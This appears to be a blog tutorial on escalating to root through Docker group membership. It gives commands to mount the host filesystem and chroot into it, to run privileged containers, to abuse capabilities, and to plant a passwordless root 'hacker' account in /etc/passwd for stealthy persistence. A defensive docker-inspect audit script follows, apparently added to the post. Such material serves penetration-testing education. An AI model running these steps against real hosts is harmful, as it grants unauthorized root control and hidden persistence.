Docker: Part 3 — Privilege Escalation via Docker
Once you confirm that Docker is running — or that you’re in the docker group — the path to root is often just a few commands away.
In this post, you’ll learn:
- How to abuse Docker group membership
- How to interact with the Docker socket
- How to mount the host filesystem
- How to use chroot to escape containers
- How to escalate privileges through misconfigurations
Why Docker Group Access is Dangerous
The Docker daemon (dockerd) runs as root. If you can interact with it (via docker CLI or directly through /var/run/docker.sock), you can tell it to:
- Launch containers
- Mount host filesystems
- Run commands
And all of it runs as root on the host.
Membership in the docker group = root access. Period.
Method 1: Mount Host Filesystem and Escape with chroot
If you’re in the docker group or can access the Docker socket, this is the classic privilege escalation technique.
Step 1: List available Docker images
```bash
docker images
```
If none are available, pull a base image:
```bash
docker pull ubuntu:18.04
```
Step 2: Run a container with the host filesystem mounted
```bash
docker run -it -v /:/mnt --rm ubuntu:18.04
```
This mounts the host’s root (/) into the container’s /mnt directory.
Step 3: Escape to the host environment
```bash
chroot /mnt
```
You’re now in the host’s root filesystem. You’ve broken out of the container. You are root.
Step 4: Confirm access
```bash
whoami
hostname
cat /root/flag
```
You have full host access.
Method 2: Exploit the Docker Socket Directly
Even if you don’t have docker installed but have write access to /var/run/docker.sock, you can interact with Docker using low-level API requests.
Step 1: Confirm socket permissions
```bash
ls -l /var/run/docker.sock
```
If you have read/write access, proceed.
Step 2: Use curl to spin up a container (advanced)
Or use tools like socat to bind a shell. But usually, it’s easier to install the docker client binary and go back to Method 1.
Method 3: Run a Privileged Container
If Docker is configured to allow privileged containers, you can gain access to host devices, kernel modules, and more.
Step 1: Run privileged container
```bash
docker run -it --privileged --rm ubuntu:18.04
```
Inside this container, check:
```bash
ls /dev
```
If you see /dev/kmsg, /dev/mem, or other hardware-level interfaces, you’re in a strong position to escalate further — even if chroot isn’t an option.
Method 4: Create a New Root User on the Host
If you mounted the host filesystem, you can manually add a new root-level user.
```bash
echo 'hacker::0:0::/root:/bin/bash' >> /mnt/etc/passwd
```
Then you can switch to that user once you exit the container.
This is stealthier than full chroot and useful in long-term access or red team scenarios.
Method 5: Abuse Capabilities from Inside the Container
If the container is running with dangerous Linux capabilities (like cap_sys_admin, cap_net_admin), you can often:
- Mount additional filesystems
- Load kernel modules
- Modify networking rules
Check capabilities inside the container:
```bash
capsh --print
```
Or try mounting a filesystem from inside the container:
```bash
mount -t proc proc /mnt/proc
```
In some cases, even without full Docker access, capabilities alone are enough to get root on the host.
Summary
| Method | Description | Result |
|---|---|---|
| Mount host FS | Start container with -v /:/mnt | Escape via chroot, get root |
| Docker socket | Abuse /var/run/docker.sock | Full control via API |
| Privileged container | --privileged flag | Access to host-level devices |
| Add root user | Modify /etc/passwd via mount | Persistent root access |
| Capabilities abuse | Leverage leaked caps | Mount, escape, privesc |
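A defender-side check to go with the summary, added here as an example that is not part of the original post: it parses `docker inspect` output (the real `HostConfig.Privileged`, `HostConfig.CapAdd` and `Mounts` fields) and flags the host-root bind mount, the privileged flag and the capability grants that Methods 1, 3, 4 and 5 rely on. The sample JSON is constructed, and the dangerous-capability and sensitive-path lists are my assumptions.

```python
"""Flag docker-inspect records showing the misconfigurations described above."""
import json

# Capabilities whose grant lets a container mount, load modules or reshape
# host networking (cap_sys_admin / cap_net_admin are the post's examples).
DANGEROUS_CAPS = {"SYS_ADMIN", "NET_ADMIN", "SYS_MODULE", "SYS_PTRACE", "ALL"}

# Host paths that, bind-mounted into a container, expose the host root,
# its account database or the Docker socket itself (assumed list).
SENSITIVE_SOURCES = {"/", "/etc", "/root", "/var/run/docker.sock", "/proc", "/dev"}

# Constructed sample shaped like `docker inspect <id> ...` (only the keys used).
SAMPLE_INSPECT = json.dumps([
    {"Name": "/escape-test",
     "HostConfig": {"Privileged": False, "CapAdd": None},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt"}]},
    {"Name": "/priv-box",
     "HostConfig": {"Privileged": True, "CapAdd": ["cap_net_admin"]},
     "Mounts": []},
    {"Name": "/web",
     "HostConfig": {"Privileged": False, "CapAdd": None},
     "Mounts": [{"Type": "bind", "Source": "/srv/www",
                 "Destination": "/usr/share/nginx/html"}]},
])

def audit(inspect_json: str) -> dict:
    """Return {container_name: [finding, ...]}; clean containers are omitted."""
    findings = {}
    for c in json.loads(inspect_json):
        hits = []
        hc = c.get("HostConfig") or {}
        if hc.get("Privileged"):
            hits.append("privileged: all host devices visible (Method 3)")
        for cap in hc.get("CapAdd") or []:
            name = cap.upper()
            name = name[4:] if name.startswith("CAP_") else name
            if name in DANGEROUS_CAPS:
                hits.append(f"dangerous capability added: {cap} (Method 5)")
        for m in c.get("Mounts") or []:
            src = m.get("Source", "")
            if m.get("Type") == "bind" and src in SENSITIVE_SOURCES:
                hits.append(f"host path {src} bound at {m.get('Destination')} (Methods 1/4)")
        if hits:
            findings[c["Name"].lstrip("/")] = hits
    return findings

if __name__ == "__main__":
    for name, hits in audit(SAMPLE_INSPECT).items():
        print(name + ":", *("\n  - " + h for h in hits))
```

On a live host, feed it `docker inspect $(docker ps -q)` and pair the result with a check that `/var/run/docker.sock` is not world-writable and that the docker group holds only accounts you would also trust with root.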
Coming Up Next
In Part 4: Escaping Docker Containers, we’ll switch perspectives. Instead of breaking into the host from Docker, you’ll learn how to break out of an unprivileged container — using real-world escape techniques and known vulnerabilities.
